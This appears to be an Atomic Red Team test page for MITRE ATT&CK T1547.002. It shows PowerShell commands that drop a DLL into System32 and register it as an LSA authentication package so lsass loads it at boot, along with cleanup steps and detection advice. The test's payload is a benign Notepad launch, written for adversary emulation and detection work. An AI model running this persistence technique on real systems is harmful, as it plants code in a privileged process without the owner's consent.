# T1547.002 - Authentication Package
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.

## Atomic Tests

### Atomic Test #1 - Authentication PackageEstablishes persistence using a custom authentication package for the Local Security Authority (LSA).
After a reboot, Notepad.exe will be executed as child process of lsass.exe.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package
[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Copy-Item $PathToAtomicsFolder\T1547.002\bin\package.dll C:\Windows\System32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f
```

In [ ]:
Invoke-AtomicTest T1547.002 -TestNumbers 1

#### Cleanup: 
```powershell
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0" /f
rm -force C:\windows\system32\package.dll
```

In [ ]:
Invoke-AtomicTest T1547.002 -TestNumbers 1 -Cleanup

## Detection
Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe</code> with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)